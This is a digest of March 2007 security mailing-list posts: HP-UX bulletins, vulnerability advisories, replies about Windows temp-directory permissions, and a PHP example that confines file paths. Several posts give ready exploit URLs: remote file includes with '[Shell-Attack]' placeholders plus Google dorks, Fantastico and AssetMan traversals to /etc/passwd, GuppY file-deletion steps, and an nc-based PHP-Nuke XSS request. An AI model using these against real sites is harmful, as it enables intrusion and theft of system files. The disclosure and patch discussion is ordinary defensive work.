Re: Php Nuke POST XSS on steroids

2007-03-12 Thread ascii
Paul Laudanski wrote:
> I tried both your scripts at a few locations, and all I get back is this
[cut]

hi Paul, long time from ccc : )

it happens because http headers must be on a single line, it's a
formatting issue (my fault, i used to put a link to a plain text
version but this time i forgot about it), i've just created a txt
version of the advisory available here:

http://phpfi.com/214668

it should be more usable, i dunno when the demos will stop working
on phpnuke.org so i've asked wisec to upload this video since www.ush.it
has bandwidth issues

http://www.wisec.it/ush/phpnukexss.html

obviously to bypass the anti-CSRF filter you have to mix the XSS with
the import_request_variables() trick (this doesn't work on phpnuke.org
because they have globals on, this is why i chose that domain)

consider that import_request_variables() will allow you to do much
more than an XSS, this is just an example advisory on an example product

See you,
Francesco `ascii` Ongaro
http://www.ush.it/


Remote File Include In Script moodle-1.7.1

2007-03-12 Thread RaeD Hasadya
By Hasadya Raed
Contact : RaeD [At] BsdMail [Dot] Com
--
Script : moodle-1.7.1
Dork : "Copyright (c) moodle"
--
B.Files : 
utfdbmigrate.php
filter.php
--
Exploits :
http://www.Victim.com/moodle/admin/utfdbmigrate.php?cmd=[Shell-Attack]
http://www.Victim.com/moodle/filter.php?cmd=[Shell-Attack]

 

-- 
___
Get your free email from http://bsdmail.com


Re: PHP-Nuke <= 8.0 Cookie Manipulation (lang)

2007-03-12 Thread Paul Laudanski



[EMAIL PROTECTED] wrote:

Patch:

} elseif (isset($lang)) {
    if (eregi('[A-Za-z]', $lang)) {
        if (file_exists("language/lang-".$lang.".php")) {
            include_once("language/lang-".$lang.".php");
            $currentlang = $lang;
        } else {
            include_once("language/lang-english.php");
            $currentlang = "english";
        }
    } else {
        include_once("language/lang-english.php");
        $currentlang = "english";
    }
} else {

/
Best Regards
Aleksandar
Programmer and Web Developer
///

  
Building on your patch you'd want to incorporate basename().  You never 
want to accept directory traversal attempts into variables.


Paul Laudanski, CastleCops
http://www.linkedin.com/pub/1/49a/17b
Submit Phish: www.castlecops.com/pirt
www.castlecops.com | de.castlecops.com | wiki.castlecops.com


GuppY v4.0 remote del files/index

2007-03-12 Thread sn0oPy . team
* GuppY v4.0 remote del files/index

* By : sn0oPy

* Risk : high

* site :  http://www.freeguppy.org/

* Dork : inurl:"/guppy/index.php"

* exploit :

 just add install/install.php to the script folder
 http://www.target.ma/guppy/install/install.php
 choose "Installation propre" >>> next >>> choose "Suppression des 
fichiers d'installation"  >>> next >>>


* contact : [EMAIL PROTECTED]

* greetz : [subzero], Avg Team(forums.avenir-geopolitique.net).

* Reference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2728


[security bulletin] HPSBUX02196 SSRT071318 rev.2 - HP-UX Java (JRE and JDK) Remote Execution of Arbitrary Code

2007-03-12 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00876579
Version: 2

HPSBUX02196 SSRT071318 rev.2 - HP-UX Java (JRE and JDK) Remote Execution of 
Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2007-03-09
Last Updated: 2007-03-09

Potential Security Impact: Remote execution of arbitrary code.

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Java Runtime Environment (JRE) and Java Developer Kit (JDK) may allow a remote 
user to execute arbitrary code.

References: CVE-2007-0243, CVE-2006-6745, CVE-2006-6731

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11 and B.11.23 running Java Runtime Environment (JRE) and Java 
Developer Kit (JDK):
Release 5.0.05 i.e., Release 1.5.0.05,
Release 1.4.2.11 and earlier,
Release 1.3.1.19 and earlier.

BACKGROUND

The Sun Java Runtime Environment (JRE) and Java Developer Kit (JDK) contain 
multiple vulnerabilities that can allow a remote, unauthenticated user to 
execute arbitrary code on a vulnerable system.

AFFECTED VERSIONS

NOTE: To determine if a system has an affected version, search the output of 
"swlist -a revision -l fileset" for an affected fileset. Then determine if a 
fixed revision or applicable patch is installed.

HP-UX B.11.11
HP-UX B.11.23
===
Jpi14.JPI14-COM
Jpi14.JPI14-COM-DOC
Jpi14.JPI14-IPF32
Jpi14.JPI14-PA11
Jdk14.JDK14-COM
Jdk14.JDK14-DEMO
Jdk14.JDK14-IPF32
Jdk14.JDK14-IPF64
Jdk14.JDK14-PA11
Jdk14.JDK14-PA20
Jdk14.JDK14-PA20W
Jdk14.JDK14-PNV2
Jdk14.JDK14-PWV2
Jre14.JRE14-COM
Jre14.JRE14-COM-DOC
Jre14.JRE14-IPF32
Jre14.JRE14-IPF32-HS
Jre14.JRE14-IPF64
Jre14.JRE14-IPF64-HS
Jre14.JRE14-PA11
Jre14.JRE14-PA11-HS
Jre14.JRE14-PA20
Jre14.JRE14-PA20-HS
Jre14.JRE14-PA20W
Jre14.JRE14-PA20W-HS
Jre14.JRE14-PNV2
Jre14.JRE14-PNV2-H
Jre14.JRE14-PWV2
Jre14.JRE14-PWV2-H
action:install revision 1.4.2.12.00 or subsequent.

Jdk15.JDK15-COM
Jdk15.JDK15-DEMO
Jdk15.JDK15-IPF32
Jdk15.JDK15-IPF64
Jdk15.JDK15-PA20
Jdk15.JDK15-PA20W
Jdk15.JDK15-PNV2
Jdk15.JDK15-PWV2
Jre15.JRE15-COM
Jre15.JRE15-COM-DOC
Jre15.JRE15-IPF32
Jre15.JRE15-IPF32-HS
Jre15.JRE15-IPF64
Jre15.JRE15-IPF64-HS
Jre15.JRE15-PA20
Jre15.JRE15-PA20-HS
Jre15.JRE15-PA20W
Jre15.JRE15-PA20W-HS
Jre15.JRE15-PNV2
Jre15.JRE15-PNV2-H
Jre15.JRE15-PWV2
Jre15.JRE15-PWV2-H
action:install revision 1.5.0.06 or subsequent

END AFFECTED VERSIONS

NOTE: The version number returned by "$java -version" and the version returned 
by swlist for Java are different. For example, when the $java -version is 5.0.6 
the version shown by swlist is 1.5.0.06.

RESOLUTION

HP is providing the following Java updates to resolve the JRE potential 
vulnerability. The updates are available from: http://www.hp.com/go/java
The HP website mentions Java 5.0, which can be recognized from the swlist -l fileset 
return value of 1.5.0.01.06.
These issues are addressed in the following versions of the HP Java:
* JDK and JRE 1.5.0.6 or subsequent,
* SDK and JRE 1.4.2.12 or subsequent,
* SDK and JRE 1.3.1.20 or subsequent.
If the latest version of Java is installed, older versions of Java may remain 
installed on the system. If these versions of Java are not needed, you may wish 
to remove them.

MANUAL ACTIONS: Yes - Update
For Java 1.5.0.00.00, update to Java 1.5.0.06 or subsequent.
 ->For Java 1.4.2.11 and earlier, update to revision 1.4.2.12 or subsequent.
For Java 1.3.1.19 or earlier, update to revision 1.3.1.20 or subsequent.

PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application 
that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security 
Bulletins and lists recommended actions that may apply to a specific HP-UX 
system. It can also download patches and create a depot automatically. For more 
information see: https://www.hp.com/go/swa

HISTORY:
Version: 1 (rev.1) 06 March 2007 Initial release
Version: 2 (rev.2) 09 March 2007 Corrected typo in Manual Actions, in SSRT #.

Third Party Security Patches: Third party security patches which are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: [EMAIL PROTECTED]
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
  To: [EMAIL PROTECTED]
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and p

RIM BlackBerry Pearl 8100 Browser DoS

2007-03-12 Thread clappymonkey
RIM BlackBerry Pearl 8100 Browser DoS
--

12 March 2007

Summary:
A vulnerability has been discovered that could impact upon the availability of 
the BlackBerry 8100 Wireless handheld (v4.2.0.51). It is possible for a remote 
attacker to construct a WML page that contains an overly long string value 
within a link (e.g.: ). Should the page or 
link be accessed by BlackBerry devices, this leads to a temporary Denial of 
Service within the 4thPass browser component on the device, and temporary 
device inoperability. Normal functionality will be returned to the browser / 
device after an amount of time relative to the size of the link supplied, or by 
physically removing and reinserting the battery thereby creating a reset.

Business Impact:
Exploitation of this issue can lead to a loss of device functionality.  

Affected Product(s):
The BlackBerry 8100 (Pearl) handheld device (v4.2.0.51)

Remediation:
Upgrade to vendor patch 4.2.1

Additional details of this vulnerability are available from the vendor at 
www.blackberry.com/security/news.jsp

Credit:
Michael Kemp (www.clappymonkey.com)


Fantastico In all Version Cpanel 10.x <= local File Include

2007-03-12 Thread z3r0 z3r0.2.z3r0

##
Fantastico In all Version Cpanel 10.x <= local File Include

##to the
Note : Preparations php.ini in Cpanel  hypothetical and They also in
all WebServer

Must provide username  And pass  and login  :2082
To break the strongest protection   mod_security  & safe_mode:On  &
Disable functions :  All NONE



Vulnerable Code ( 1  ) :
 if(is_file($userlanguage))
   {
   include ( $userlanguage );

In

http://xx.com:2082/frontend/x/fantastico/includes/load_language.php



Exploit  1 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/home/user/shell.php

id
uid=32170(user) gid=32170(user) groups=32170(user)

Exploit  2 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/etc/passwd

###
Vulnerable Code ( 2  ) :

$localmysqlconfig=$fantasticopath . "/includes/mysqlconfig.local.php";
if (is_file($localmysqlconfig))
{
include($localmysqlconfig);

in
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php
And also many of the files of the program

Exploit :
First  Create directory Let the name (/includes/)
and upload Shell.php  in (/includes/) Then  rename
mysqlconfig.local.php   D:

:::xploit
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php?fantasticopath=/home/user/



###


Discovered By : cyb3rt & 020
###

Special Greetings :_ Tryag-Team  &  4lKaSrGoLd3n-Team
###


Remote File Include In ClipShare.v1.5.3

2007-03-12 Thread RaeD Hasadya
By Hasadya Raed
Contact : RaeD [At] BsdMail [Dot] Com / GunMan_Pump [At] Hotmail [Dot] Com

Script : ClipShare.v1.5.3
Dork : "Copyright © 2006 Powered By Clip-Share.Com. All rights reserved"

B.File : 
adodb-connection.inc.php

Exploit : 
http://www.Victim.com/Path/include/adodb-connection.inc.php?cmd=[Shell-Attack]




Re: Php Nuke POST XSS on steroids

2007-03-12 Thread Paul Laudanski



ascii wrote:

Php Nuke POST XSS on steroids

 Name  Php Nuke POST XSS on steroids
 Systems Affected  PHP >=4.0.7 <=5.2.1, GLOBALS OFF, Php Nuke 8.0 and
   others (partially verified)
 Severity  Medium
 Vendorhttp://php nuke.org/
 Advisory  http://www.ush.it/2007/03/09/php-nuke-wild-post-xss/
 Authors   Francesco `ascii` Ongaro ([EMAIL PROTECTED])
   Stefano `wisec` di Paola ([EMAIL PROTECTED])
 Date  20070307
--- >8 --- >8 --- >8 --- >8 --- testsuite.sh --- >8 --- >8 --- >8 --- >8

#!/bin/bash

cat > REQ << TOKEN
POST /modules.php?name=Downloads&d_op=search&query= HTTP/1.1
Host: www.phpnuke.org
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2)
Gecko/20070220 Firefox/2.0.0.2
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer: http://www.phpnuke.org/modules.php?name=Downloads
Cookie: lang=english
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

query=token<>token

TOKEN

cat REQ | nc www.phpnuke.org 80 -vvv

--- >8 --- >8 --- >8 --- >8 ---  --- >8 --- >8 --- >8 --- >8

$ ./testcase | grep "token<>token"
DNS fwd/rev mismatch: www.phpnuke.org != ev1s-67-15-16-43.ev1servers.net
www.phpnuke.org [67.15.16.43] 80 (http) open
http://www.ush.it/

  

I tried both your scripts at a few locations, and all I get back is this:



400 Bad Request

Bad Request
Your browser sent a request that this server could not understand.
Request header field is missing ':' separator.

Gecko/20070220 Firefox/2.0.0.2





Re: Wiki Remote Authentication Bypass Vulnerability

2007-03-12 Thread Matt D. Harris
This is the designed behavior of the application, not an "exploit" as 
you claim.  In addition to that, the syntax used in your example URLs 
is specific to MediaWiki, and not common amongst all wiki apps, as you 
claim.  Furthermore, this "exploit" does not work "100% of the time" - 
even if this could be called an exploit, which it clearly is not, 
protecting an entry and configuring levels of access are relatively 
common and simple tasks for Wiki administrators.
Your claim that this is an access validation error is simply wrong, and 
is akin to saying that being able to write to a file which a user 
intentionally sets to mode 0777 is an error.

- Matt

[EMAIL PROTECTED] wrote:

Wiki Remote Authentication Bypass Vulnerability



The Exploit Works 100 % of the time. It really is up to the admin to add security 
like locking a page to prevent editing. There are two ways of having this Exploit 
work. One is simply to add the code (example 1) after the page you want to test or, 
if that doesn't work, add Code (example 2) and Exploit code after the new page's 
name! Anyone using any type of Wiki project is vulnerable. Successfully 
exploiting this issue allows remote attackers to gain remote administrative 
access to the vulnerable site's pages. Attackers can use a browser to exploit 
this issue.


Hackers Center Security Group (http://www.hackerscenter.com)
Credit: Doz



Class: Access Validation Error

Remote: Yes



Vendor: http://www.wiki.org/
Version: N/A



Exploit: ?action=edit

Example 1: http://www.Site.com/wiki/Main_Page?action=edit

Example 2: http://www.Site.com/wiki/Hacked?action=edit



Proof of Concept: (Concealed)



Security researcher? Join us: mail Zinho at zinho at hackerscenter.com



--
/*
 * Matt D. Harris <[EMAIL PROTECTED]>
 *  Solitox Networks - Lead Project Engineer
 */


AssetMan 2.4a <= (download_pdf.php) Remote File Disclosure Vulnerability

2007-03-12 Thread BorN To K!LL BorN To K!LL

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
|
|AssetMan 2.4a <= (download_pdf.php) Remote File Disclosure Vulnerability
|
|Script: AssetMan
|
|Version: 2.4a
|
|URL: http://www.bctree.com/~assetman/assetman-2.4a.zip
|
|Discovered by: BorN To K!LL
|
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
|
|Bug in:
|download_pdf.php
|
|Code:
|readfile($_GET["pdf_file"]);
|
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
|
|ExploiT:
|~
|wWw.SiTe.cOm/[path]/download_pdf.php?pdf_file=../../../../etc/passwd
|
|+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
|
|GreeTz 2:
|Dr.2 - str0ke - AsbMay .
|
|KuW SeC  AsbMay's Group 
|
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

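The two PHP defects in this digest, the unanchored eregi() check on the PHP-Nuke $lang cookie (where Paul Laudanski suggests basename()) and AssetMan's readfile($_GET["pdf_file"]), are the same mistake: a request value reaches the filesystem without being confined to one directory. The following is an added example written for this digest; it is not code from PHP-Nuke, AssetMan or any of the posters. The function names, directory layout and sample files are assumptions constructed for the demo.

```php
<?php
// Added example (not PHP-Nuke or AssetMan code): confine user-supplied file
// names to a directory before include() or readfile(). Names, directories and
// sample files below are assumptions constructed for this demo.
declare(strict_types=1);

/**
 * Resolve $userName strictly inside $baseDir.
 * Returns the canonical path, or null if the name contains a NUL byte,
 * escapes the directory, does not exist, or is not a regular file.
 */
function confinedPath(string $baseDir, string $userName): ?string
{
    if (strpos($userName, "\0") !== false) {   // NUL would truncate the path in C
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // basename() drops every directory component ("../../etc/passwd" -> "passwd"),
    // so a traversal attempt cannot leave $baseDir through the name itself.
    $candidate = $base . DIRECTORY_SEPARATOR . basename($userName);
    $real = realpath($candidate);              // also follows symlinks
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Prefix check catches a symlink inside $baseDir pointing elsewhere.
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

/**
 * PHP-Nuke style language selection: accept only ^[a-z]+\z AND an existing
 * language/lang-<name>.php inside $languageDir; otherwise fall back to english.
 * (The original eregi('[A-Za-z]', $lang) is unanchored, so "../x" passes it.)
 */
function selectLanguageFile(string $languageDir, ?string $lang): string
{
    if ($lang !== null && preg_match('/^[a-z]+\z/', $lang) === 1) {
        $file = confinedPath($languageDir, 'lang-' . $lang . '.php');
        if ($file !== null) {
            return $file;
        }
    }
    return $languageDir . DIRECTORY_SEPARATOR . 'lang-english.php';
}

/**
 * AssetMan style download: serve a .pdf only from $pdfDir,
 * never readfile() on the raw request value.
 */
function serveConfinedPdf(string $pdfDir, string $requested): bool
{
    $file = confinedPath($pdfDir, $requested);
    if ($file === null || strtolower(pathinfo($file, PATHINFO_EXTENSION)) !== 'pdf') {
        http_response_code(404);
        return false;
    }
    header('Content-Type: application/pdf');
    header('Content-Disposition: attachment; filename="' . basename($file) . '"');
    header('Content-Length: ' . (string) filesize($file));
    readfile($file);
    return true;
}

// --- Demo on a throwaway directory (constructed input) ---------------------
$tmp = sys_get_temp_dir() . '/confine_demo_' . getmypid();
mkdir("$tmp/language", 0700, true);
mkdir("$tmp/pdf", 0700, true);
file_put_contents("$tmp/language/lang-english.php", "<?php \$greeting = 'hello';\n");
file_put_contents("$tmp/language/lang-german.php", "<?php \$greeting = 'hallo';\n");
file_put_contents("$tmp/pdf/report.pdf", "%PDF-1.4 constructed sample\n");

// Cookie values an attacker might send: only real language names get through.
foreach (['german', 'english', '../../etc/passwd', "english\0", 'nosuch'] as $lang) {
    printf("lang=%-22s -> %s\n", json_encode($lang),
        basename(selectLanguageFile("$tmp/language", $lang)));
}
// pdf_file values: anything outside $tmp/pdf resolves to null (rejected).
foreach (['report.pdf', '../../../../etc/passwd', 'report.pdf/../../x'] as $name) {
    printf("pdf=%-26s -> %s\n", $name, confinedPath("$tmp/pdf", $name) ?? 'REJECTED');
}

foreach (glob("$tmp/*/*") as $f) { unlink($f); }
rmdir("$tmp/language"); rmdir("$tmp/pdf"); rmdir($tmp);
```

Run it with `php` from the command line; serveConfinedPdf() is defined but not called because it writes the file to stdout. basename() alone is enough to defeat the `../../../../etc/passwd` string from the AssetMan post, but the realpath() prefix check is what protects against a symlink planted inside the served directory, which is why both are kept.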




Remote File Include In Script PHP Photo Album

2007-03-12 Thread RaeD Hasadya
By Hasadya Raed
Contact : [EMAIL PROTECTED]
-
Script : PHP Photo Album
Dork : "Powered by PHP Photo Album"
-
B.File :
common.php
--
Exploit : 
http://www.Victim.com/Path_Script/common.php?db_file=[Shell-Attack]
 




Wiki Remote Authentication Bypass Vulnerability

2007-03-12 Thread DoZ
Wiki Remote Authentication Bypass Vulnerability



The Exploit Works 100 % of the time. It really is up to the admin to add security 
like locking a page to prevent editing. There are two ways of having this Exploit 
work. One is simply to add the code (example 1) after the page you want to test or, 
if that doesn't work, add Code (example 2) and Exploit code after the new page's 
name! Anyone using any type of Wiki project is vulnerable. Successfully 
exploiting this issue allows remote attackers to gain remote administrative 
access to the vulnerable site's pages. Attackers can use a browser to exploit 
this issue.


Hackers Center Security Group (http://www.hackerscenter.com)
Credit: Doz



Class: Access Validation Error

Remote: Yes



Vendor: http://www.wiki.org/
Version: N/A



Exploit: ?action=edit

Example 1: http://www.Site.com/wiki/Main_Page?action=edit

Example 2: http://www.Site.com/wiki/Hacked?action=edit



Proof of Concept: (Concealed)



Security researcher? Join us: mail Zinho at zinho at hackerscenter.com


Re[2]: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues

2007-03-12 Thread 3APA3A
Dear Thor (Hammer of God),

 You are wrong at least for Windows XP/2003. There is a common temporary
 directory

 %WINDIR%\Temp

 It's  used  as a %TEMP% if application is launched without local logon,
 e.g. system service.

 For  example, services launched with LocalSystem account will have these
 environment variables:

SystemRoot=C:\WINDOWS
TEMP=C:\WINDOWS\TEMP
TMP=C:\WINDOWS\TEMP
USERPROFILE=C:\Documents and Settings\LocalService
 

 You  can  find  it's really used, because it's never empty. I see, e.g.
 files  related  to  different  Intel  drivers,  VMWare,  Microsoft .Net
 framework, Exchange and Sharepoint.

 Also,  I  remember  I  had  problems with securing ABN AMRO Bank client
 software installation, because it uses %WINDIR%\Temp for some reason.

 And now is most exciting: Users have permission to create files in this
 directory, that is pre-open attack is possible.

--Saturday, March 10, 2007, 7:28:27 PM, you wrote to bugtraq@securityfocus.com:

THoG> Apps utilizing temporary files should always use the TEMP or TMP 
environment
THoG> variables, not a hard-coded path.  And by default, each user has their own
THoG> temp directory created (in XP/Server it is "\Documents and 
THoG> Settings\username\Local Settings\temp" and in Vista it is 
THoG> "\Users\username\AppData\Local\Temp") that only they have permissions to
THoG> (with SYSTEM and Administrators, of course).  It's not like there is some
THoG> global "Full Control" temp directory created by default.

THoG> t



THoG> - Original Message - 
THoG> From: "Roger A. Grimes" <[EMAIL PROTECTED]>
THoG> To: "Tim" <[EMAIL PROTECTED]>
THoG> Cc: ;
THoG> 
THoG> Sent: Friday, March 09, 2007 9:42 AM
THoG> Subject: RE: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file
THoG> management security issues


THoG> So, let me get this. An app storing sensitive data doesn't make its own
THoG> temp storage folders in a secure location, and instead relies upon one
THoG> of the few folders in Windows that all users have Full Control to, and
THoG> this is a Windows problem?  In Linux, if an app uses \tmp, is that a
THoG> Linux issue?

THoG> Sounds like a developer issue to me.

THoG> Roger

THoG> -Original Message-
THoG> From: Tim [mailto:[EMAIL PROTECTED]
THoG> Sent: Friday, March 09, 2007 11:20 AM
THoG> To: Roger A. Grimes
THoG> Cc: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk
THoG> Subject: Re: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file
THoG> management security issues


THoG> I find your assessment somewhat short-sighted.  I have conducted code
THoG> reviews on several commercial apps which use C:\TEMP in very insecure
THoG> ways to store sensitive data.  It seems some of these attacks would be
THoG> possible in those situations.

THoG> Sure, Windows is already pathetically insecure against an attackers
THoG> already on the local system, but this would be yet another attack
THoG> vector.

THoG> tim




-- 
~/ZARAZA http://securityvulns.com/
Smack the ENIACs in the face! (Lem)



[security bulletin] HPSBUX02129 SSRT061149 rev.2 - HP-UX running SLP, Remote Unauthorized Access

2007-03-12 Thread security-alert

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00717872
Version: 2

HPSBUX02129 SSRT061149 rev.2 - HP-UX running SLP, Remote Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2007-03-05
Last Updated: 2007-03-05

Potential Security Impact: Remote Unauthorized Access

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified in HP-UX when running 
Service Locator Protocol (SLP). The vulnerability could be exploited by a remote 
user of Service Locator Protocol (SLP) for unauthorized access.

References: SUSE-SA:2005:015

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23

BACKGROUND

SLP implementation on HP-UX is based on OpenSLP version 0.8.0 developed by 
Caldera Systems, Inc. 

To determine if an HP-UX system has an affected version, search the output of 
"swlist -a revision -l fileset" for one of the filesets listed below. For 
affected systems verify that the recommended action has been taken. 

AFFECTED VERSIONS 
 ->HP-UX B.11.11 
=== 
upgrade_SLP.INETSVCS-RUN 
action: install revision 1.2 or subsequent 
 ->URL: http://software.hp.com 

HP-UX B.11.23 
=== 
InternetSrvcs.INETSVCS2-RUN 
action: install PHNE_33508 or subsequent 

END AFFECTED VERSIONS 



RESOLUTION
HP has made the following patch and web upgrade available to resolve this 
issue. 

B.11.23 PHNE_33508 or subsequent 
The patch can be retrieved from: http://itrc.hp.com 

 ->The B.11.11 SLP Revision 1.2 update can be retrieved from: 
http://software.hp.com 

PRODUCT SPECIFIC INFORMATION 
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application 
that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security 
Bulletins and lists recommended actions that may apply to a specific HP-UX 
system. It can also download patches and create a depot automatically.  For 
more information see: https://www.hp.com/go/swa 

MANUAL ACTIONS: Yes - Update 

HP-UX B.11.11 Update to HP-UX SLP Revision 1.2 or subsequent 
HP-UX B.11.23 No manual actions 

HISTORY: 
Version: 1 (rev.1) 25 September 2006 Initial release 
Version: 2 (rev.2) 06 March 2007 Updated web upgrade location for B.11.11 

Third Party Security Patches: Third party security patches which are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy. 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: [EMAIL PROTECTED] 
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: [EMAIL PROTECTED] 
  Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.


To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is 
represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW 
MA = HP Management Agents 
MI = Misc. 3rd Party SW 
MP = HP MPE/iX 
NS = HP NonStop Servers 
OV = HP OpenVMS 
PI = HP Printing & Imaging 
ST = HP Storage SW 
TL = HP Trusted Linux 
TU = HP Tru64 UNIX 
UX = HP-UX 
VV = HP VirtualVault 

System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers with current secure 
solutions.


"HP is broadly distributing this Security Bulletin in order to bring to the 
attention of users of the affected HP products the important security 
information contained in this Bulletin. HP recommends that all users determine 
the applicability of this information to their individual situations and take 
appropriate action. HP does not warrant that this information is necessarily 
accurate or complete for all u

Re: Re[2]: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues

2007-03-12 Thread Thor (Hammer of God)

2 things:

My point is what apps SHOULD do- use the "user" temp variable, not the 
system temp variable if you want to easily have inherited, user-based 
security.  Not sure why your ABN AMRO client makes its files in 
%WINDIR%\temp, but that's not necessary.  It probably requires local admin 
too, given that.


Secondly, I said there is not a "global Full Control" directory, and there 
is not.  The %WINDIR%\Temp directory has "special" permissions.  For users, 
it is only Traverse Folder/Execute File, Create Files/Write Data, and Create 
Folders/Append Data.  Not List Folder/Read Data, no read attributes, no 
write attributes, no delete, etc, etc.


And all subfolders in Temp inherit those permissions.  I know it's used 
extensively by system and admin installation, but that's not my point at 
all.  Someone chimed in about C:\temp and sensitive data, and blah blah, so 
I simply stated that user variables usage for temp files mitigate that. 
Also, there is no "Global Full Control" directory created by default temp 
files and there's not.  Sure you can create one if you want and use that 
(which obviously someone did for C:\temp because it does not exist by 
default) but that's more of Roger's point in that "if you do things 
insecurely and without thinking, then someone can take advantage of that." 
And I think he's right on that.


But as Mark said, the overall issue is interesting at some level, 
particularly if you can leverage it even with limited permissions in 
\windows\temp, though I also think many many things must go "wrong" first. 
But, that being said, I've seen enough of your posts to know that you know 
what you are doing, so I have respect for your work even though I may not 
totally agree all the time.


t


Learn to secure your Microsoft installations with Tim Mullen's
"Microsoft Ninjitsu Black Belt Edition" at Blackhat Vegas.  Registration 
open now.

http://www.blackhat.com/html/bh-usa-07/train-bh-us-07-tm-ms-bbe.html





- Original Message - 
From: "3APA3A" <[EMAIL PROTECTED]>

To: "Thor (Hammer of God)" <[EMAIL PROTECTED]>
Cc: ; "Roger A. Grimes" <[EMAIL PROTECTED]>; 
"Tim" <[EMAIL PROTECTED]>; 


Sent: Saturday, March 10, 2007 2:32 PM
Subject: Re[2]: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file 
management security issues



Dear Thor (Hammer of God),

You are wrong at least for Windows XP/2003. There is a common temporary
directory

%WINDIR%\Temp

It's  used  as a %TEMP% if application is launched without local logon,
e.g. system service.

For  example, services launched with LocalSystem account will have these
environment variables:

SystemRoot=C:\WINDOWS
TEMP=C:\WINDOWS\TEMP
TMP=C:\WINDOWS\TEMP
USERPROFILE=C:\Documents and Settings\LocalService


You  can  find  it's really used, because it's never empty. I see, e.g.
files  related  to  different  Intel  drivers,  VMWare,  Microsoft .Net
framework, Exchange and Sharepoint.

Also,  I  remember  I  had  problems with securing ABN AMRO Bank client
software installation, because it uses %WINDIR%\Temp for some reason.

And now is most exciting: Users have permission to create files in this
directory, that is pre-open attack is possible.

--Saturday, March 10, 2007, 7:28:27 PM, you wrote to 
bugtraq@securityfocus.com:


THoG> Apps utilizing temporary files should always use the TEMP or TMP 
environment
THoG> variables, not a hard-coded path.  And by default, each user has their 
own

THoG> temp directory created (in XP/Server it is "\Documents and
THoG> Settings\username\Local Settings\temp" and in Vista it is
THoG> "\Users\username\AppData\Local\Temp") that only they have permissions 
to
THoG> (with SYSTEM and Administrators, of course).  It's not like there is 
some

